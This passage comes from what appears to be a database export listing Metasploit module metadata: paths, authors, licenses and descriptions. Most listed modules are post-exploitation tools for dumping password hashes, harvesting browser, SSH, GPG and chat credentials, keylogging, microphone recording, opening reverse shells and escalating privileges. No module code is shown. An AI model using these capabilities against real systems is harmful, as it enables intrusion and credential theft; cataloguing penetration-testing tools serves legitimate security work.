00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/voip/sip_deregister.rb","auxiliary","voip/sip_deregister","auxiliary/voip/sip_deregister","SIP Deregister Extension",300,"This module will attempt to deregister a SIP user from the provider. 
It has been tested successfully when the sip provider/server doesn't use REGISTER authentication.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"ChrisJohnRiley" 1808,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/voip/sip_invite_spoof.rb","auxiliary","voip/sip_invite_spoof","auxiliary/voip/sip_invite_spoof","SIP Invite Spoof",300,"This module will create a fake SIP invite request making the targeted device ring and display fake caller id information.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"ChrisJohnRiley, David Maynor " 1809,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb","auxiliary","vsploit/malware/dns/dns_mariposa","auxiliary/vsploit/malware/dns/dns_mariposa","VSploit Mariposa DNS Query Module",300,"This module queries known Mariposa Botnet DNS records.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.defintel.com/docs/Mariposa_Analysis.pdf","MJC" 1810,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/vsploit/malware/dns/dns_query.rb","auxiliary","vsploit/malware/dns/dns_query","auxiliary/vsploit/malware/dns/dns_query","VSploit DNS Beaconing Emulation",300,"This module takes a list and emulates malicious DNS beaconing.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"MJC" 1811,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb","auxiliary","vsploit/malware/dns/dns_zeus","auxiliary/vsploit/malware/dns/dns_zeus","VSploit Zeus DNS Query Module",300,"This module queries known Zeus Botnet DNS records.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-https://zeustracker.abuse.ch/blocklist.php?download=domainblocklist","MJC" 1812,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/vsploit/pii/email_pii.rb","auxiliary","vsploit/pii/email_pii","auxiliary/vsploit/pii/email_pii","VSploit Email 
PII",300,"This auxiliary reads from a file and sends data which should be flagged via an internal or external SMTP server.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"willis" 1813,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/vsploit/pii/web_pii.rb","auxiliary","vsploit/pii/web_pii","auxiliary/vsploit/pii/web_pii","VSploit Web PII",300,"This module emulates a webserver leaking PII data","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.metasploit.com","MJC" 1814,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/aix/hashdump.rb","post","aix/hashdump","post/aix/hashdump","AIX Gather Dump Password Hashes",300,"Post Module to dump the password hashes for all users on an AIX System","Metasploit Framework License (BSD)","f",,,,,"t",,"theLightCosine " 1815,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/cisco/gather/enum_cisco.rb","post","cisco/gather/enum_cisco","post/cisco/gather/enum_cisco","Gather Cisco Device General Information",300,"This module collects a Cisco IOS or NXOS device information and configuration.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1816,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/linux/gather/checkvm.rb","post","linux/gather/checkvm","post/linux/gather/checkvm","Linux Gather Virtual Environment Detection",300,"This module attempts to determine whether the system is running inside of a virtual environment and if so, which one. 
This module supports detection of Hyper-V, VMWare, VirtualBox, Xen, and QEMU/KVM.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1817,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/linux/gather/enum_configs.rb","post","linux/gather/enum_configs","post/linux/gather/enum_configs","Linux Gather Configurations",300,"This module collects configuration files found on commonly installed applications and services, such as Apache, MySQL, Samba, Sendmail, etc. If a config file is found in its default path, the module will assume that is the file we want.","Metasploit Framework License (BSD)","f",,,,,"t",,"ohdae " 1818,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/linux/gather/enum_network.rb","post","linux/gather/enum_network","post/linux/gather/enum_network","Linux Gather Network Information",300,"This module gathers network information from the target system IPTables rules, interfaces, wireless information, open and listening ports, active network connections, DNS information and SSH information.","Metasploit Framework License (BSD)","f",,,,,"t",,"Stephen Haywood , ohdae " 1819,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/linux/gather/enum_protections.rb","post","linux/gather/enum_protections","post/linux/gather/enum_protections","Linux Gather Protection Enumeration",300,"This module tries to find certain installed applications that can be used to prevent, or detect our attacks, which is done by locating certain binary locations, and see if they are indeed executables. For example, if we are able to run 'snort' as a command, we assume it's one of the files we are looking for. 
This module is meant to cover various antivirus, rootkits, IDS/IPS, firewalls, and other software.","Metasploit Framework License (BSD)","f",,,,,"t",,"ohdae " 1820,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/linux/gather/enum_system.rb","post","linux/gather/enum_system","post/linux/gather/enum_system","Linux Gather System and User Information",300,"This module gathers system information. We collect installed packages, installed services, mount information, user list, user bash history and cron jobs","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez , Stephen Haywood , ohdae , sinn3r " 1821,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/linux/gather/enum_users_history.rb","post","linux/gather/enum_users_history","post/linux/gather/enum_users_history","Linux Gather User History",300,"This module gathers user specific information. User list, bash history, mysql history, vim history, lastlog and sudoers.","Metasploit Framework License (BSD)","f",,,,,"t",,"ohdae " 1822,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/linux/gather/enum_xchat.rb","post","linux/gather/enum_xchat","post/linux/gather/enum_xchat","Linux Gather XChat Enumeration",300,"This module will collect XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. 
The CHATS option will simply download all the .log files.","Metasploit Framework License (BSD)","f",,,,,"t",,"sinn3r " 1823,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/linux/gather/hashdump.rb","post","linux/gather/hashdump","post/linux/gather/hashdump","Linux Gather Dump Password Hashes for Linux Systems",300,"Post Module to dump the password hashes for all users on a Linux System.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1824,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/linux/gather/mount_cifs_creds.rb","post","linux/gather/mount_cifs_creds","post/linux/gather/mount_cifs_creds","Linux Gather Saved mount.cifs/mount.smbfs Credentials",300,"Post Module to obtain credentials saved for mount.cifs/mount.smbfs in /etc/fstab on a Linux system.","Metasploit Framework License (BSD)","f",,,,,"t",,"Jon Hart " 1825,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/linux/gather/pptpd_chap_secrets.rb","post","linux/gather/pptpd_chap_secrets","post/linux/gather/pptpd_chap_secrets","Linux Gather PPTP VPN chap-secrets Credentials",300,"This module collects PPTP VPN information such as client, server, password, and IP from your target server's chap-secrets file.","Metasploit Framework License (BSD)","f",,,,,"t",,"sinn3r " 1826,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/linux/manage/download_exec.rb","post","linux/manage/download_exec","post/linux/manage/download_exec","Linux Manage Download and Execute",300,"This module downloads and runs a file with bash. It first tries to use curl as its HTTP client and then wget if it's not found. Bash found in the PATH is used to execute the file.","Metasploit Framework License (BSD)","f",,,,,"t",,"Joshua D. 
Abraham " 1827,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/escalate/metasploit_pcaplog.rb","post","multi/escalate/metasploit_pcaplog","post/multi/escalate/metasploit_pcaplog","Metasploit pcap_log Local Privilege Escalation",0,"Metasploit < 4.4 contains a vulnerable 'pcap_log' plugin which, when used with the default settings, creates pcap files in /tmp with predictable file names. This exploits this by hard-linking these filenames to /etc/passwd, then sending a packet with a priviliged user entry contained within. This, and all the other packets, are appended to /etc/passwd. Successful exploitation results in the creation of a new superuser account. This module requires manual clean-up. Upon success, you should remove /tmp/msf3-session*pcap files and truncate /etc/passwd. Note that if this module fails, you can potentially induce a permanent DoS on the target by corrupting the /etc/passwd file.","Metasploit Framework License (BSD)","f","2012-07-16 00:00:00",,,,"t","BID-54472, URL-http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html, URL-https://community.rapid7.com/docs/DOC-1946","0a29406d9794e4f9b30b3c5d6702c708" 1828,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/apple_ios_backup.rb","post","multi/gather/apple_ios_backup","post/multi/gather/apple_ios_backup","Windows Gather Apple iOS MobileSync Backup File Collection",300,"This module will collect sensitive files from any on-disk iOS device backups","Metasploit Framework License (BSD)","f",,,,,"t",,"bannedit , hdm " 1829,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/dns_bruteforce.rb","post","multi/gather/dns_bruteforce","post/multi/gather/dns_bruteforce","Multi Gather DNS Forward Lookup Bruteforce",300,"Brute force subdomains and hostnames via wordlist.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1830,"2013-05-07 
00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/dns_reverse_lookup.rb","post","multi/gather/dns_reverse_lookup","post/multi/gather/dns_reverse_lookup","Multi Gather DNS Reverse Lookup Scan",300,"Performs DNS reverse lookup using the OS included DNS query command.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1831,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/dns_srv_lookup.rb","post","multi/gather/dns_srv_lookup","post/multi/gather/dns_srv_lookup","Multi Gather DNS Service Record Lookup Scan",300,"Enumerates know SRV Records for a given domaon using target host DNS query tool.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1832,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/enum_vbox.rb","post","multi/gather/enum_vbox","post/multi/gather/enum_vbox","Multi Gather VirtualBox VM Enumeration",300,"This module will attempt to enumerate any VirtualBox VMs on the target machine. 
Due to the nature of VirtualBox, this module can only enumerate VMs registered for the current user, thereforce, this module needs to be invoked from a user context.","Metasploit Framework License (BSD)","f",,,,,"t",,"theLightCosine " 1833,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/env.rb","post","multi/gather/env","post/multi/gather/env","Multi Gather Generic Operating System Environment Settings",300,"This module prints out the operating system environment variables","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez , egypt " 1834,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/fetchmailrc_creds.rb","post","multi/gather/fetchmailrc_creds","post/multi/gather/fetchmailrc_creds","UNIX Gather .fetchmailrc Credentials",300,"Post Module to obtain credentials saved for IMAP, POP and other mail retrieval protocols in fetchmail's .fetchmailrc","Metasploit Framework License (BSD)","f",,,,,"t",,"Jon Hart " 1835,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/filezilla_client_cred.rb","post","multi/gather/filezilla_client_cred","post/multi/gather/filezilla_client_cred","Multi Gather FileZilla FTP Client Credential Collection",300,"This module will collect credentials from the FileZilla FTP client if it is installed.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez , bannedit " 1836,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/find_vmx.rb","post","multi/gather/find_vmx","post/multi/gather/find_vmx","Multi Gather VMWare VM Identification",300,"This module will attempt to find any VMWare virtual machines stored on the target.","Metasploit Framework License (BSD)","f",,,,,"t",,"theLightCosine " 1837,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/firefox_creds.rb","post","multi/gather/firefox_creds","post/multi/gather/firefox_creds","Multi Gather Firefox Signon Credential 
Collection",300,"This module will collect credentials from the Firefox web browser if it is installed on the targeted machine. Additionally, cookies are downloaded. Which could potentially yield valid web sessions. Firefox stores passwords within the signons.sqlite database file. There is also a keys3.db file which contains the key for decrypting these passwords. In cases where a Master Password has not been set, the passwords can easily be decrypted using third party tools. If a Master Password was used the only option would be to bruteforce.","Metasploit Framework License (BSD)","f",,,,,"t",,"bannedit " 1838,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/gpg_creds.rb","post","multi/gather/gpg_creds","post/multi/gather/gpg_creds","Multi Gather GnuPG Credentials Collection",300,"This module will collect the contents of user's .gnupg directory on the targeted machine. Password protected secret keyrings can be cracked with JtR.","Metasploit Framework License (BSD)","f",,,,,"t",,"Dhiru Kholia " 1839,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/multi_command.rb","post","multi/gather/multi_command","post/multi/gather/multi_command","Multi Gather Run Shell Command Resource File",300,"This module will read shell commands from a resource file and execute the commands in the specified Meterpreter or shell session.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1840,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/netrc_creds.rb","post","multi/gather/netrc_creds","post/multi/gather/netrc_creds","UNIX Gather .netrc Credentials",300,"Post Module to obtain credentials saved for FTP and other services in .netrc","Metasploit Framework License (BSD)","f",,,,,"t",,"Jon Hart " 1841,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/pgpass_creds.rb","post","multi/gather/pgpass_creds","post/multi/gather/pgpass_creds","Multi Gather pgpass 
Credentials",300,"This module will collect the contents of user's .pgpass or pgpass.conf and parse them for credentials.","Metasploit Framework License (BSD)","f",,,,,"t",,"Zach Grace " 1842,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/pidgin_cred.rb","post","multi/gather/pidgin_cred","post/multi/gather/pidgin_cred","Multi Gather Pidgin Instant Messenger Credential Collection",300,"This module will collect credentials from the Pidgin IM client if it is installed.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez , bannedit " 1843,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/ping_sweep.rb","post","multi/gather/ping_sweep","post/multi/gather/ping_sweep","Multi Gather Ping Sweep",300,"Performs IPv4 ping sweep using the OS included ping command.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1844,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/run_console_rc_file.rb","post","multi/gather/run_console_rc_file","post/multi/gather/run_console_rc_file","Multi Gather Run Console Resource File",300,"This module will read console commands from a resource file and execute the commands in the specified Meterpreter session.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1845,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/skype_enum.rb","post","multi/gather/skype_enum","post/multi/gather/skype_enum","Multi Gather Skype User Data Enumeration",300,"This module will enumerate Skype account settings, contact list, call history, chat logs, file transfer history, and voicemail logs, saving all the data to CSV files for analysis.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1846,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/ssh_creds.rb","post","multi/gather/ssh_creds","post/multi/gather/ssh_creds","Multi Gather OpenSSH PKI Credentials 
Collection",300,"This module will collect the contents of user's .ssh directory on the targeted machine. Additionally, known_hosts and authorized_keys and any other files are also downloaded. This module is largely based on firefox_creds.rb.","Metasploit Framework License (BSD)","f",,,,,"t",,"Jim Halfpenny" 1847,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/thunderbird_creds.rb","post","multi/gather/thunderbird_creds","post/multi/gather/thunderbird_creds","Multi Gather Mozilla Thunderbird Signon Credential Collection",300,"This module will collect credentials from Mozilla Thunderbird by downloading the necessary files such as 'signons.sqlite', 'key3.db', and 'cert8.db' for offline decryption with third party tools. If necessary, you may also set the PARSE optioin to true to parse the sqlite file, which contains sensitive information such as the encrypted username/password. However, this feature is not enabled by default, because it requires SQLITE3 gem to be installed on your machine.","Metasploit Framework License (BSD)","f",,,,,"t",,"sinn3r " 1848,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/general/close.rb","post","multi/general/close","post/multi/general/close","Multi Generic Operating System Session Close",300,"This module closes the specified session. 
This can be useful as a finisher for automation tasks","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 1849,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/general/execute.rb","post","multi/general/execute","post/multi/general/execute","Multi Generic Operating System Session Command Execution",300,"This module executes an arbitrary command line","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 1850,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/manage/multi_post.rb","post","multi/manage/multi_post","post/multi/manage/multi_post","Multi Manage Post Module Macro Execution",300,"This module will execute a list of modules given in a macro file in the format of against the select session checking for compatibility of the module against the sessions and validation of the options provided.","Metasploit Framework License (BSD)","f",,,,,"t",,"carlos_perez " 1851,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/manage/record_mic.rb","post","multi/manage/record_mic","post/multi/manage/record_mic","Multi Manage Record Microphone",300,"This module will enable and record your target's microphone. For non-Windows targets, please use Java meterpreter to be able to use this feature.","Metasploit Framework License (BSD)","f",,,,,"t",,"sinn3r " 1852,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/manage/sudo.rb","post","multi/manage/sudo","post/multi/manage/sudo","Multiple Linux / Unix Post Sudo Upgrade Shell",300,"This module attempts to upgrade a shell account to UID 0 by reusing the given password and passing it to sudo. 
This technique relies on sudo versions from 2008 and later which support -A.","Metasploit Framework License (BSD)","f",,,,,"t","URL-http://www.sudo.ws/repos/sudo/file/05780f5f71fd/sudo.h","Ryan Baxendale , todb " 1853,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/manage/system_session.rb","post","multi/manage/system_session","post/multi/manage/system_session","Multi Manage System Remote TCP Shell Session",300,"This module will create a Reverse TCP Shell on the target system using the system own scripting enviroments installed on the target.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1854,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/osx/admin/say.rb","post","osx/admin/say","post/osx/admin/say","OS X Text to Speech Utility",300,"This module will speak whatever is in the 'TEXT' option on the victim machine.","Metasploit Framework License (BSD)","f",,,,,"t","URL-http://www.gabrielserafini.com/blog/2008/08/19/mac-os-x-voices-for-using-with-the-say-command/","sinn3r " 1855,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/osx/gather/enum_adium.rb","post","osx/gather/enum_adium","post/osx/gather/enum_adium","OS X Gather Adium Enumeration",300,"This module will collect Adium's account plist files and chat logs from the victim's machine. There are three different actions you may choose: ACCOUNTS, CHATS, and ALL. Note that to use the 'CHATS' action, make sure you set the regex 'PATTERN' option in order to look for certain log names (which consists of a contact's name, and a timestamp). The current 'PATTERN' option is configured to look for any log created on February 2012 as an example. 
To loot both account plists and chat logs, simply set the action to 'ALL'.","Metasploit Framework License (BSD)","f",,,,,"t",,"sinn3r " 1856,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/osx/gather/enum_airport.rb","post","osx/gather/enum_airport","post/osx/gather/enum_airport","OS X Gather Airport Wireless Preferences",300,"This module will download OS X Airport Wireless preferences from the victim machine. The preferences file (which is a plist) contains information such as: SSID, Channels, Security Type, Password ID, etc.","Metasploit Framework License (BSD)","f",,,,,"t",,"sinn3r " 1857,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/osx/gather/enum_chicken_vnc_profile.rb","post","osx/gather/enum_chicken_vnc_profile","post/osx/gather/enum_chicken_vnc_profile","OS X Gather Chicken of the VNC Profile",300,"This module will download the ""Chicken of the VNC"" client application's profile file, which is used to store other VNC servers' information such as as the IP and password.","Metasploit Framework License (BSD)","f",,,,,"t",,"sinn3r " 1858,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/osx/gather/enum_colloquy.rb","post","osx/gather/enum_colloquy","post/osx/gather/enum_colloquy","OS X Gather Colloquy Enumeration",300,"This module will collect Colloquy's info plist file and chat logs from the victim's machine. There are three actions you may choose: INFO, CHATS, and ALL. Please note that the CHAT action may take a long time depending on the victim machine, therefore we suggest to set the regex 'PATTERN' option in order to search for certain log names (which consists of the contact's name, and a timestamp). 
The default 'PATTERN' is configured as ""^alien"" as an example to search for any chat logs associated with the name ""alien"".","Metasploit Framework License (BSD)","f",,,,,"t",,"sinn3r " 1859,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/osx/gather/enum_keychain.rb","post","osx/gather/enum_keychain","post/osx/gather/enum_keychain","OS X Gather Keychain Enumeration",300,"This module presents a way to quickly go through the current user's keychains and collect data such as email accounts, servers, and other services. Please note: when using the GETPASS option, the user will have to manually enter the password, and then click 'allow' in order to collect each password.","Metasploit Framework License (BSD)","f",,,,,"t",,"ipwnstuff " 1860,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/osx/gather/enum_osx.rb","post","osx/gather/enum_osx","post/osx/gather/enum_osx","OS X Gather Mac OS X System Information Enumeration",300,"This module gathers basic system information from Mac OS X Tiger, Leopard, Snow Leopard and Lion systems.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1861,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/osx/gather/hashdump.rb","post","osx/gather/hashdump","post/osx/gather/hashdump","OS X Gather Mac OS X Password Hash Collector",300,"This module dumps SHA-1, LM and NT Hashes of Mac OS X Tiger, Leopard, Snow Leopard and Lion Systems.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez , hammackj " 1862,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/post/pro/cisco/gather/ios_info.rb","post","pro/cisco/gather/ios_info","post/pro/cisco/gather/ios_info","Cisco IOS Gather Configuration",300,"This module will attempt to gather device information from a session on a Cisco IOS device.","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm , thelightcosine" 1863,"2013-05-30 
16:15:32","/opt/metasploit/apps/pro/modules/post/pro/device/gather/device_info.rb","post","pro/device/gather/device_info","post/pro/device/gather/device_info","Unknown Device Gather Info",300,"This module will attempt to get information about unknown devices.","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm , thelightcosine" 1864,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/post/pro/multi/agent.rb","post","pro/multi/agent","post/pro/multi/agent","Metasploit Pro Persistent Agent",300,"Install a persistent agent (in-memory or on-disk) with a maximum execution time","Rapid7 Proprietary","f",,,,,"t",,"hdm " 1865,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/post/pro/multi/agent_cleaner.rb","post","pro/multi/agent_cleaner","post/pro/multi/agent_cleaner","Metasploit Pro Persistent Agent Cleaner",300,"Remove a persistent agent installed by the Agent module","Rapid7 Proprietary","f",,,,,"t",,"hdm " 1866,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/post/pro/multi/gather/hashdump.rb","post","pro/multi/gather/hashdump","post/pro/multi/gather/hashdump","Pro: Multi Gather Hashdump",300,"This module will attempt to gather passwd and shadow files from the target. 
If it is able to retrieve both, it will attempt to unshadow them as well for future cracking.","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm , thelightcosine" 1867,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/post/pro/multi/gather/sysinfo.rb","post","pro/multi/gather/sysinfo","post/pro/multi/gather/sysinfo","Unix Gather System Info",300,"This module will gather system information about the target.","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm , thelightcosine" 1868,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/post/pro/multi/macro.rb","post","pro/multi/macro","post/pro/multi/macro","Metasploit Pro Post Exploitation Macro Launcher",300,"Execute a macro that was defined in the Metasploit Pro user interface.","Rapid7 Proprietary","f",,,,,"t",,"hdm " 1869,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/post/pro/windows/escalate/getsystem.rb","post","pro/windows/escalate/getsystem","post/pro/windows/escalate/getsystem","Windows Escalate GetSystem",300,"This module will attempt to escalate priviliges using the getsystem command.","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm , thelightcosine" 1870,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/post/pro/windows/gather/files.rb","post","pro/windows/gather/files","post/pro/windows/gather/files","Windows Gather Network Info",300,"This module will gather files matching the supplied pattern.","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm , thelightcosine" 1871,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/post/pro/windows/gather/net_info.rb","post","pro/windows/gather/net_info","post/pro/windows/gather/net_info","Windows Gather Network Info",300,"This module will gather network configuration information about the target.","Metasploit Framework License (BSD)","f",,,,,"t",,"thelightcosine" 1872,"2013-05-30 
16:15:32","/opt/metasploit/apps/pro/modules/post/pro/windows/gather/process_list.rb","post","pro/windows/gather/process_list","post/pro/windows/gather/process_list","Windows Gather Process List",300,"This module will gather the list of running processes on the target.","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm , thelightcosine" 1873,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/post/pro/windows/gather/screenshot.rb","post","pro/windows/gather/screenshot","post/pro/windows/gather/screenshot","Windows Capture Desktop Screenshot",300,"This module will take a snapshot of the interactive desktop. If a screeensaver is running, it will be stopped prior to the screenshot being taken.","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 1874,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/post/pro/windows/gather/sysinfo.rb","post","pro/windows/gather/sysinfo","post/pro/windows/gather/sysinfo","Windows Gather System Info",300,"This module will gather system information about the Windows Session.","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm , thelightcosine" 1875,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/post/pro/windows/gather/wininfo_shell.rb","post","pro/windows/gather/wininfo_shell","post/pro/windows/gather/wininfo_shell","Windows Gather System Info (Shell)",300,"This module will gather system information about the Windows Session. This module is for shell sessions instead of meterpreter.","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm , thelightcosine" 1876,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/solaris/gather/checkvm.rb","post","solaris/gather/checkvm","post/solaris/gather/checkvm","Solaris Gather Virtual Environment Detection",300,"This module attempts to determine whether the system is running inside of a virtual environment and if so, which one. 
This module supports detectoin of Solaris Zone, VMWare, VirtualBox, Xen, and QEMU/KVM.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1877,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/solaris/gather/enum_packages.rb","post","solaris/gather/enum_packages","post/solaris/gather/enum_packages","Solaris Gather Installed Packages",300,"Post Module to enumerate installed packages on a Solaris System","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1878,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/solaris/gather/enum_services.rb","post","solaris/gather/enum_services","post/solaris/gather/enum_services","Solaris Gather Configured Services",300,"Post Module to enumerate services on a Solaris System","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1879,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/solaris/gather/hashdump.rb","post","solaris/gather/hashdump","post/solaris/gather/hashdump","Solaris Gather Dump Password Hashes for Solaris Systems",300,"Post Module to dump the password hashes for all users on a Solaris System","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1880,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/capture/keylog_recorder.rb","post","windows/capture/keylog_recorder","post/windows/capture/keylog_recorder","Windows Capture Keystroke Recorder",300,"This module can be used to capture keystrokes. To capture keystrokes when the session is running as SYSTEM, the MIGRATE option must be enabled and the CAPTURE_TYPE option should be set to one of Explorer, Winlogon, or a specific PID. To capture the keystrokes of the interactive user, the Explorer option should be used with MIGRATE enabled. Keep in mind that this will demote this session to the user's privileges, so it makes sense to create a separate session for this task. 
The Winlogon option will capture the username and password entered into the logon and unlock dialog. The LOCKSCREEN option can be combined with the Winlogon CAPTURE_TYPE to for the user to enter their clear-text password.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1881,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/capture/lockout_keylogger.rb","post","windows/capture/lockout_keylogger","post/windows/capture/lockout_keylogger","Winlogon Lockout Credential Keylogger",300,"This module migrates and logs Microsoft Windows user's passwords via Winlogon.exe. Using idle time and natural system changes to give a false sense of security to the user.","Metasploit Framework License (BSD)","f",,,,,"t","URL-http://blog.metasploit.com/2010/12/capturing-windows-logons-with.html","cg, mubix " 1882,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/escalate/bypassuac.rb","post","windows/escalate/bypassuac","post/windows/escalate/bypassuac","Windows Escalate UAC Protection Bypass",300,"This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. 
